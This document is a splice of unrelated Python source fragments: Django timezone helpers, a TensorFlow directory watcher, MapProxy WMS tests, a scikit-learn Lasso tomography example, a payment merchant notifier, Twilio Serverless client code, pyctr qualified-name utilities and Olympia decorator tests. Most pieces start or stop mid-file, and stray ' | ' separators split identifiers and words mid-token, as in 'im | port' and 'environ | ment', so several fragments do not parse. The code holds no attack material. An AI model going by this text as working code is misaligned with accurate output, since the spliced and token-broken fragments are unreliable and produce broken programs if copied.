# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.or |
#-------------------------------------------------------------------------
#
# Copyright (c) 2009, IMB, RWTH Aachen.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in simvisage/LICENSE.txt and may be redistri | buted only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.simvisage.com/licenses/BSD.txt
#
# Thanks for using Simvisage open source!
#
# Created on Nov 18, 2011 by: matthias
from traits.api import | \
provides
from oricreate.opt import \
IFu
from .fu import \
Fu
@provides(IFu)
class FuPotEngBending(Fu):
'''Optimization criteria based on minimum Bending energy of gravity.
This plug-in class lets the crease pattern operators evaluate the
integral over the spatial domain in an instantaneous configuration
'''
def get_f(self, t=0):
'''Get the bending energy of gravity.
'''
return self.forming_task.formed_object.V
def get_f_du(self, t=0):
'''Get the derivatives with respect to individual displacements.
'''
return self.forming_task.formed_object.V_du
|
"""Contains the implementation for the DirectoryWatcher class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.platform import gfile
from tensorflow.python.platform im | port logging
class DirectoryWatcher(object):
"""A DirectoryWatcher wraps a loader to load from a directory.
A loader reads a file on disk and produces some kind of values as an
iterator. A DirectoryWatcher takes a | directory with one file at a time being
written to and a factory for loaders and watches all the files at once.
This class is *only* valid under the assumption that files are never removed
and the only file ever changed is whichever one is lexicographically last.
"""
def __init__(self, directory, loader_factory, path_filter=lambda x: True):
"""Constructs a new DirectoryWatcher.
Args:
directory: The directory to watch. The directory doesn't have to exist.
loader_factory: A factory for creating loaders. The factory should take a
file path and return an object that has a Load method returning an
iterator that will yield all events that have not been yielded yet.
path_filter: Only files whose full path matches this predicate will be
loaded. If not specified, all files are loaded.
Raises:
ValueError: If directory or loader_factory is None.
"""
if directory is None:
raise ValueError('A directory is required')
if loader_factory is None:
raise ValueError('A loader factory is required')
self._directory = directory
self._loader_factory = loader_factory
self._loader = None
self._path = None
self._path_filter = path_filter
def Load(self):
"""Loads new values from disk.
The watcher will load from one file at a time; as soon as that file stops
yielding events, it will move on to the next file. We assume that old files
are never modified after a newer file has been written. As a result, Load()
can be called multiple times in a row without losing events that have not
been yielded yet. In other words, we guarantee that every event will be
yielded exactly once.
Yields:
All values that were written to disk that have not been yielded yet.
"""
# If the loader exists, check it for a value.
if not self._loader:
self._InitializeLoader()
while True:
# Yield all the new events in the file we're currently loading from.
for event in self._loader.Load():
yield event
next_path = self._GetNextPath()
if not next_path:
logging.info('No more files in %s', self._directory)
# Current file is empty and there are no new files, so we're done.
return
# There's a new file, so check to make sure there weren't any events
# written between when we finished reading the current file and when we
# checked for the new one. The sequence of events might look something
# like this:
#
# 1. Event #1 written to file #1.
# 2. We check for events and yield event #1 from file #1
# 3. We check for events and see that there are no more events in file #1.
# 4. Event #2 is written to file #1.
# 5. Event #3 is written to file #2.
# 6. We check for a new file and see that file #2 exists.
#
# Without this loop, we would miss event #2. We're also guaranteed by the
# loader contract that no more events will be written to file #1 after
# events start being written to file #2, so we don't have to worry about
# that.
for event in self._loader.Load():
yield event
logging.info('Directory watcher for %s advancing to file %s',
self._directory, next_path)
# Advance to the next file and start over.
self._SetPath(next_path)
def _InitializeLoader(self):
path = self._GetNextPath()
if path:
self._SetPath(path)
else:
raise StopIteration
def _SetPath(self, path):
self._path = path
self._loader = self._loader_factory(path)
def _GetNextPath(self):
"""Returns the path of the next file to use or None if no file exists."""
sorted_paths = [os.path.join(self._directory, path)
for path in sorted(gfile.ListDirectory(self._directory))]
# We filter here so the filter gets the full directory name.
filtered_paths = (path for path in sorted_paths
if self._path_filter(path) and path > self._path)
return next(filtered_paths, None)
|
# This file is part of the MapProxy project.
# Copyright (C) 2014 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from mapproxy.request.wms import WMS111MapRequest, WMS111CapabilitiesRequest
from mapproxy.test.system import module_setup, module_teardown, SystemTest, make_base_config
from mapproxy.test.image import is_png, is_transparent
from mapproxy.test.image import tmp_image, assert_colors_equal, img_from_buf
from mapproxy.test.http import mock_httpd
from mapproxy.test.system.test_wms import bbox_srs_from_boundingbox
from mapproxy.test.unit.test_grid import assert_almost_equal_bbox
from nose.tools import eq_
test_config = {}
base_config = make_base_config(test_config)
def setup_module():
module_setup(test_config, 'wms_srs_extent.yaml')
def teardown_module():
module_teardown(test_config)
class TestWMSSRSExtentTest(SystemTest):
config = test_config
def setup(self):
SystemTest.setup(self)
self.common_req = WMS111MapRequest(url='/service?', param=dict(service='WMS',
version='1.1.1'))
def test_wms_capabilities(self):
req = WMS111CapabilitiesRequest(url='/service?').copy_with_request_params(self.common_req)
resp = self.app.get(req)
eq_(resp.content_type, 'application/vnd.ogc.wms_xml')
xml = resp.lxml
bboxs = xml.xpath('//Layer/Layer[1]/BoundingBox')
bboxs = dict((e.attrib['SRS'], e) for e in bboxs)
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:31467']),
[2750000.0, 5000000.0, 4250000.0, 6500000.0])
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:25832']),
[0.0, 3500000.0, 1000000.0, 8500000.0])
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:3857']),
[-20037508.3428, -147730762.670, 20037508.3428, 147730758.195])
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:4326']),
[-180.0, -90.0, 180.0, 90.0])
# bboxes clipped to coverage
bboxs = xml.xpath('//Layer/Layer[2]/BoundingBox')
bboxs = dict((e.attrib['SRS'], e) for e in bboxs)
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:31467']),
[3213331.57335, 5540436.91132, 3571769.72263, 6104110.432])
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:25832']),
[213372.048961, 5538660.64621, 571666.447504, 6102110.74547])
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:3857']),
[556597.453966, 6446275.84102, 1113194.90793, 7361866.11305])
assert_almost_equal_bbox(
bbox_srs_from_boundingbox(bboxs['EPSG:4326']),
[5.0, 50.0, 10.0, 55.0])
def test_out_of_extent(self):
resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
'&LAYERS=direct&STYLES='
'&WIDTH=100&HEIGHT=100&FORMAT=image/png'
'&BBOX=-10000,0,0,1000&SRS=EPSG:25832'
'&VERSION=1.1.0&TRANSPARENT=TRUE')
# empty/transparent response
eq_(resp.content_type, 'image/png')
assert is_png(resp.body)
assert is_transparent(resp.body)
def test_out_of_extent_bgcolor(self):
resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
'&LAYERS=direct&STYLES='
'&WIDTH=100&HEIGHT=100&FORMAT=image/png'
'&BBOX=-10000,0,0,1000&SRS=EPSG:25832'
'&VERSION=1.1.0&TRANSPARENT=FALSE&BGCOLOR=0xff0000')
# red response
eq_(resp.content_type, 'image/png')
assert is_png(resp.body)
assert_colors_equal(img_from_buf(resp.body).convert('RGBA'),
[(100 * 100, [255, 0, 0, 255])])
def test_clipped(self):
with tmp_image((256, 256), format='png', color=(255, 0, 0)) as img:
expected_req = ({'path':
r'/service?LAYERs=bar&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=100&SRS=EPSG%3A25832&styles='
'&VERSION=1.1.1&BBOX=0.0,3500000.0,150.0,3500100.0'
| '&WIDTH=75'},
{'body': img.read(), 'headers': {'content-type': 'image/png'}})
with mock_httpd(('localhost', 42423), [expected_req]):
resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
'&LAYERS=direct&STYLES='
'&WIDTH | =100&HEIGHT=100&FORMAT=image/png'
'&BBOX=-50,3500000,150,3500100&SRS=EPSG:25832'
'&VERSION=1.1.0&TRANSPARENT=TRUE')
eq_(resp.content_type, 'image/png')
assert is_png(resp.body)
colors = sorted(img_from_buf(resp.body).convert('RGBA').getcolors())
# quarter is clipped, check if it's transparent
eq_(colors[0][0], (25 * 100))
eq_(colors[0][1][3], 0)
eq_(colors[1], (75 * 100, (255, 0, 0, 255)))
def test_clipped_bgcolor(self):
with tmp_image((256, 256), format='png', color=(255, 0, 0)) as img:
expected_req = ({'path':
r'/service?LAYERs=bar&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=100&SRS=EPSG%3A25832&styles='
'&VERSION=1.1.1&BBOX=0.0,3500000.0,100.0,3500100.0'
'&WIDTH=50'},
{'body': img.read(), 'headers': {'content-type': 'image/png'}})
with mock_httpd(('localhost', 42423), [expected_req]):
resp = self.app.get('http://localhost/service?SERVICE=WMS&REQUEST=GetMap'
'&LAYERS=direct&STYLES='
'&WIDTH=100&HEIGHT=100&FORMAT=image/png'
'&BBOX=-100,3500000,100,3500100&SRS=EPSG:25832'
'&VERSION=1.1.0&TRANSPARENT=FALSE&BGCOLOR=0x00ff00')
eq_(resp.content_type, 'image/png')
assert is_png(resp.body)
assert_colors_equal(img_from_buf(resp.body).convert('RGBA'),
[(50 * 100, [255, 0, 0, 255]), (50 * 100, [0, 255, 0, 255])])
|
"""
======================================================================
Compressive sensing: tomography reconstruction with L1 prior (Lasso)
======================================================================
This example shows the reconstruction of an image from a set of parallel
projections, acquired along different angles. Such a dataset is acquired in
**computed tomography** (CT).
Without any prior information on the sample, the number of projections
required to reconstruct the image is of the order of the linear size
``l`` of the image (in pixels). For simplicity we consider here a sparse
image, where only pixels on the boundary of objects have a non-zero
value. Such data could correspond for example to a cellular material.
Note however that most images are sparse in a different basis, such as
the Haar wavelets. Only ``l/7`` projections are acquired, therefore it is
necessary to use prior information available on the sample (its
sparsity): this is an example of **compressive sensing**.
The tomography projection operation is a linear transformation. In
addition to the data-fidelity term corresponding to a linear regression,
we penalize the L1 norm of the image to account for its sparsity. The
resulting optimization problem is called the :ref:`lasso`. We use the
class :class:`sklearn.linear_model.Lasso`, that uses the coordinate descent
algorithm. Importantly, this implementation is more computationally efficient
on a sparse matrix, than the projection operator used here.
The reconstruction with L1 penalization gives a result with zero error
(all pixels are successfully labeled with 0 or 1), even if noise was
added to the projections. In comparison, an L2 penalization
(:class:`sklearn.linear_model.Ridge`) produces a large number of labeling
errors for the pixels. Important artifacts are observed on the
reconstructed image, contrary to the L1 penalization. Note in particular
the circular artifact separating the pixels in the corners, that have
contributed to fewer projections than the central disk.
"""
print(__doc__)
# Author: Emmanuelle Gouillart <emmanuelle.gouillart@nsup.org>
# License: BSD 3 clause
import numpy as np
from scipy import sparse
from scipy import ndimage
from sklearn.linear_model import Lasso
from sklearn.linear_model import Ridge
import matplotlib.pyplot as plt
def _weights(x, dx=1, orig=0):
x = np.ravel(x)
floor_x = np.floor((x - orig) / dx)
alpha = (x - orig - floor_x * dx) / dx
return np.hstack((floor_x, floor_x + 1)), np.hstack((1 - alpha, alpha))
def _generate_center_coordinates(l_x):
X, Y = np.mgrid[:l_x, :l_x].astype(np.float64)
center = l_x / 2.
X += 0.5 - center
Y += 0.5 - center
return X, Y
def build_projection_operator(l_x, n_dir):
""" Compute the tomography design | matrix.
Parameters
----------
l_x : int
linear size of image array
n_dir : int
number of angles at which projections are acquired.
| Returns
-------
p : sparse matrix of shape (n_dir l_x, l_x**2)
"""
X, Y = _generate_center_coordinates(l_x)
angles = np.linspace(0, np.pi, n_dir, endpoint=False)
data_inds, weights, camera_inds = [], [], []
data_unravel_indices = np.arange(l_x ** 2)
data_unravel_indices = np.hstack((data_unravel_indices,
data_unravel_indices))
for i, angle in enumerate(angles):
Xrot = np.cos(angle) * X - np.sin(angle) * Y
inds, w = _weights(Xrot, dx=1, orig=X.min())
mask = np.logical_and(inds >= 0, inds < l_x)
weights += list(w[mask])
camera_inds += list(inds[mask] + i * l_x)
data_inds += list(data_unravel_indices[mask])
proj_operator = sparse.coo_matrix((weights, (camera_inds, data_inds)))
return proj_operator
def generate_synthetic_data():
""" Synthetic binary data """
rs = np.random.RandomState(0)
n_pts = 36
x, y = np.ogrid[0:l, 0:l]
mask_outer = (x - l / 2.) ** 2 + (y - l / 2.) ** 2 < (l / 2.) ** 2
mask = np.zeros((l, l))
points = l * rs.rand(2, n_pts)
mask[(points[0]).astype(np.int), (points[1]).astype(np.int)] = 1
mask = ndimage.gaussian_filter(mask, sigma=l / n_pts)
res = np.logical_and(mask > mask.mean(), mask_outer)
return np.logical_xor(res, ndimage.binary_erosion(res))
# Generate synthetic images, and projections
l = 128
proj_operator = build_projection_operator(l, l / 7.)
data = generate_synthetic_data()
proj = proj_operator * data.ravel()[:, np.newaxis]
proj += 0.15 * np.random.randn(*proj.shape)
# Reconstruction with L2 (Ridge) penalization
rgr_ridge = Ridge(alpha=0.2)
rgr_ridge.fit(proj_operator, proj.ravel())
rec_l2 = rgr_ridge.coef_.reshape(l, l)
# Reconstruction with L1 (Lasso) penalization
# the best value of alpha was determined using cross validation
# with LassoCV
rgr_lasso = Lasso(alpha=0.001)
rgr_lasso.fit(proj_operator, proj.ravel())
rec_l1 = rgr_lasso.coef_.reshape(l, l)
plt.figure(figsize=(8, 3.3))
plt.subplot(131)
plt.imshow(data, cmap=plt.cm.gray, interpolation='nearest')
plt.axis('off')
plt.title('original image')
plt.subplot(132)
plt.imshow(rec_l2, cmap=plt.cm.gray, interpolation='nearest')
plt.title('L2 penalization')
plt.axis('off')
plt.subplot(133)
plt.imshow(rec_l1, cmap=plt.cm.gray, interpolation='nearest')
plt.title('L1 penalization')
plt.axis('off')
plt.subplots_adjust(hspace=0.01, wspace=0.01, top=1, bottom=0, left=0,
right=1)
plt.show()
|
# -*- coding: UTF-8 -*-
import logging
from model_utils import Choices
from simptools.wrappers.http import HttpClient, HttpRequest
from requests.exceptions import ConnectionError
from payway.merchants.models import Merchant
__author__ = 'Razzhivin Alexander'
__email__ = 'admin@httpbots.com'
RESPONSE_STATUS = Choices(
('OK', 'OK'),
)
class MerchantHttpRequest(HttpRequest):
def __init__(self, merchan | t, order):
self.merchant = merchant
self.order = order
if self.merchant.result_url_method == Merchant.URL_METHODS.GET:
| self.__set_GET()
else:
self.__set_POST()
def __set_POST(self, *args, **kwargs):
self.POST = self.__request()
def __set_GET(self, *args, **kwargs):
self.GET = self.__request()
def __request(self):
return {
'url': self.merchant.result_url,
'data': {
'uid': self.order.uid,
'is_paid': self.order.is_paid,
'sum': self.order.sum.amount,
'sum_currency': self.order.sum_currency,
'description': self.order.description,
}
}
class MerchantHttpClient(HttpClient):
@classmethod
def notify(cls, merchant, order):
result = ''
try:
request = MerchantHttpRequest(merchant, order)
response = cls.execute(request)
result = response.text
except ConnectionError:
logging.warn('Problems when connecting to merchant {0}'.format(merchant.result_url))
return result
|
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of DeploymentInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
"""
params = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(
'GET',
self._uri,
params=params,
)
return DeploymentPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of DeploymentInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return DeploymentPage(self._version, response, self._solution)
def create(self, build_sid):
"""
Create a new DeploymentInstance
:param unicode build_sid: The SID of the build for the deployment
:returns: Newly created DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
"""
data = values.of({'BuildSid': build_sid, })
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return DeploymentInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
)
def get(self, sid):
"""
Constructs a DeploymentContext
:param sid: The SID that identifies the Deployment resource to fetch
:returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
"""
return DeploymentContext(
self._version,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a DeploymentContext
:param sid: The SID that identifies the Deployment resource to fetch
:returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
"""
return DeploymentContext(
self._version,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Serverless.V1.DeploymentList>'
class DeploymentPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the DeploymentPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param service_sid: The SID of the Service that the Deployment resource is associated with
:param environment_sid: The SID of the environment for the deployment
:returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentPage
"""
super(DeploymentPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of DeploymentInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
"""
return DeploymentInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Serverless.V1.DeploymentPage>'
class DeploymentContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, service_sid, environ | ment_sid, sid):
"""
Initialize the DeploymentContext
:param Version version: Version that contains the resource
:param service_sid: The SID of the Service to fetch the Deployment resource from
:param environment_sid: The SID of the environment used by the Deployment to fetch
:param sid: The SID that identifies the Deployment resource to fetch
:returns: twilio.rest.serverless.v1.service.environment | .deployment.DeploymentContext
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentContext
"""
super(DeploymentContext, self).__init__(version)
# Path Solution
self._solution = {'service_sid': service_sid, 'environment_sid': environment_sid, 'sid': sid, }
self._uri = '/Services/{service_sid}/Environments/{environment_sid}/Deployments/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a DeploymentInstance
:returns: Fetched DeploymentInstance
:rtype: twilio.rest.serverless.v1.service.environment.deployment.DeploymentInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return DeploymentInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
environment_sid=self._solution['environment_sid'],
sid=self._solution['sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Serverless.V1.DeploymentContext {}>'.format(context)
clas |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for manipulating qualified names.
A qualified name is a uniform way to refer to simple (e.g. 'foo') and composite
(e.g. 'foo.bar') syntactic symbols.
This is *not* related to the __qualname__ attribute used by inspect, which
refers to scopes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import gast
from pyctr.core import anno
from pyctr.core import parsing
class Symbol(collections.namedtuple('Symbol', ['name'])):
"""Represents a Python symbol."""
class StringLiteral(collections.namedtuple('StringLiteral', ['value'])):
"""Represents a Python string literal."""
def __str__(self):
return '\'%s\'' % self.value
def __repr__(self):
return str(self)
class NumberLiteral(collections.namedtuple('NumberLiteral', ['value'])):
"""Represents a Python numeric literal."""
def __str__(self):
return '%s' % self.value
def __repr__(self):
return str(self)
# TODO(mdanatg): Use subclasses to remove the has_attr has_subscript booleans.
class QN(object):
"""Represents a qualified name."""
def __init__(self, base, attr=None, subscript=None):
if attr is not None and subscript is not None:
raise ValueError('A QN can only be either an attr or a subscript, not '
'both: attr={}, subscript={}.'.format(attr, subscript))
self._has_attr = False
self._has_subscript = False
if attr is not None:
if not isinstance(base, QN):
raise ValueError(
'for attribute QNs, base must be a QN; got instead "%s"' % base)
if not isinstance(attr, str):
raise ValueError('attr may only be a string; got instead "%s"' % attr)
self._parent = base
# TODO(mdanatg): Get rid of the tuple - it can only have 1 or 2 elements now.
self.qn = (base, attr)
self._has_attr = True
elif subscript is not None:
if not isinstance(base, QN):
raise ValueError('For subscript QNs, base must be a QN.')
self._parent = base
self.qn = (base, subscript)
self._has_subscript = True
else:
if not isinstance(base, (str, StringLiteral, NumberLiteral)):
# TODO(mdanatg): Require Symbol instead of string.
raise ValueError(
'for simple QNs, base must be a string or a Literal object;'
' got instead "%s"' % type(base))
assert '.' not in base and '[' not in base and ']' not in base
self._parent = None
self.qn = (base,)
def is_symbol(self):
return isinstance(self.qn[0], str)
def is_simple(self):
return len(self.qn) <= 1
def is_composite(self):
return len(self.qn) > 1
def has_subscript(self):
return self._has_subscript
def has_attr(self):
return self._has_attr
@property
def parent(self):
if self._parent is None:
raise ValueError('Cannot get parent of simple name "%s".' % self.qn[0])
return self._parent
@property
def owner_set(self):
"""Returns all the symbols (simple or composite) that own this QN.
In other words, if this symbol was modified, the symbols in the owner set
may also be affected.
Examples:
'a.b[c.d]' has two owners, 'a' and 'a.b'
"""
owners = set()
if self.has_attr() or self.has_subscript():
owners.add(self.parent)
owners.update(self.parent.owner_set)
return owners
@property
def support_set(self):
"""Returns the set of simple symbols that this QN relies on.
This would be the smallest set of symbols necessary for the QN to
statically resolve (assuming properties and index ranges are verified
at runtime).
Examples:
'a.b' has only one support symbol, 'a'
'a[i]' has two support symbols, 'a' and 'i'
"""
# TODO(mdanatg): This might be the set of Name nodes in the AST. Track those?
roots = set()
if self.has_attr():
roots.update(self.parent.support_set)
elif self.has_subscript():
roots.update(self.parent.support_set)
roots.update(self.qn[1].support_set)
else:
roots.add(self)
return roots
def __hash__(self):
return hash(self.qn + (self._has_attr, self._has_subscript))
def __eq__(self, other):
return (isinstance(other, QN) and self.qn == other.qn and
self.has_subscript() == other.has_subscript() and
self.has_attr() == other.has_attr())
def __str__(self):
if self.has_subscript():
return str(self.qn[0]) + '[' + str(self.qn[1]) + ']'
if self.has_attr():
return '.'.join(map(str, self.qn))
else:
return str(self.qn[0])
def __repr__(self):
return str(self)
def ssf(self):
"""Simple symbol form."""
ssfs = [n.ssf() if isinstance(n, QN) else n for n in self.qn]
ssf_string = ''
for i in range(0, len(self.qn) - 1):
if self.has_subscript():
delimiter = '_sub_'
else:
delimiter = '_'
ssf_string += ssfs[i] + delimiter
return ssf_string + ssfs[-1]
def ast(self):
"""Determine gast.Node type of current object."""
# The caller must adjust the context appropriately.
if self.has_subscript():
return gast.Subscript(self.parent.ast(), gast.Index(self.qn[-1].ast()),
None)
if self.has_attr():
return gast.Attribute(self.parent.ast(), self.qn[-1], None)
base = self.qn[0]
if isinstance(base, str):
return gast.Name(base, None, None)
elif isinstance(base, StringLiteral):
return gast.Str(base.value)
elif isinstance(base, NumberLiteral):
return gast.Num(base.value)
else:
assert False, ('the constructor should prevent types other than '
'str, StringLiteral and NumberLiteral')
class QnResolver(gast.NodeTransformer):
"""Annotates nodes with QN information.
Note: Not using NodeAnnos to avoid circular dependencies.
"""
def visit_Name(self, node):
node = self.generic_visit(node)
anno.setanno(node, anno.Basic.QN, QN(node.id))
return node
def visit_Attribute(self, node):
node = self.generic_visit(node)
if anno.hasanno(node.value, anno.Basic.QN):
anno.setanno(node, anno.Basic.QN,
QN(anno.getanno(node.value, anno.Basic.QN), attr=node.attr))
return node
def visit_Subscript(self, node):
# TODO(mdanatg): This may no longer apply if we overload getitem.
node = self.generic_visit(node)
s = node.slice
if not isinstance(s, gast.Index):
# TODO(mdanatg): Support range and multi-dimensional indic | es.
| # Continuing silently because some demos use these.
return node
if isinstance(s.value, gast.Num):
subscript = QN(NumberLiteral(s.value.n))
elif isinstance(s.value, gast.Str):
subscript = QN(StringLiteral(s.value.s))
else:
# The index may be an expression, case in which a name doesn't make sense.
if anno.hasanno(node.slice.value, anno.Basic.QN):
subscript = anno.getanno(node.slice.value, anno.Basic.QN)
else:
return node
if anno.hasanno(node.value, anno.Basic.QN):
anno.setanno(
node, anno.Basic.QN,
QN(anno.getanno(node.value, anno.Basic.QN), subscript=subscript))
return node
def resolve(node):
return QnResolver().visit(node)
def from_str(qn_str):
node = parsing.parse_expression(qn_str)
node = resolve(node)
return anno.getanno(node, anno.Basic.QN)
|
from datetime import datetime, timedelta
from django import http
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.test import RequestFactory
from django.utils.encoding import force_text
from unittest import mock
import pytest
from olympia import amo
from olympia.amo import decorators
from olympia.amo.tests import TestCase, fxa_login_link
from olympia.users.models import UserProfile
pytestmark = pytest.mark.django_db
def test_post_required():
def func(request):
return mock.sentinel.response
g = decorators.post_required(func)
request = mock.Mock()
request.method = 'GET'
assert isinstance(g(request), http.HttpResponseNotAllowed)
request.method = 'POST'
assert g(request) == mock.sentinel.response
def test_json_view():
"""Turns a Python object into a response."""
def func(request):
return {'x': 1}
response = decorators.json_view(func)(mock.Mock())
assert isinstance(response, http.HttpResponse)
assert force_text(response.content) == '{"x": 1}'
assert response['Content-Type'] == 'application/json'
assert response.status_code == 200
def test_json_view_normal_response():
"""Normal responses get passed through."""
expected = http.HttpResponseForbidden()
def func(request):
return expected
response = decorators.json_view(func)(mock.Mock())
assert expected is response
assert response['Content-Type'] == 'text/html; charset=utf-8'
def test_json_view_error():
"""json_view.error returns 400 responses."""
response = decorators.json_view.error({'msg': 'error'})
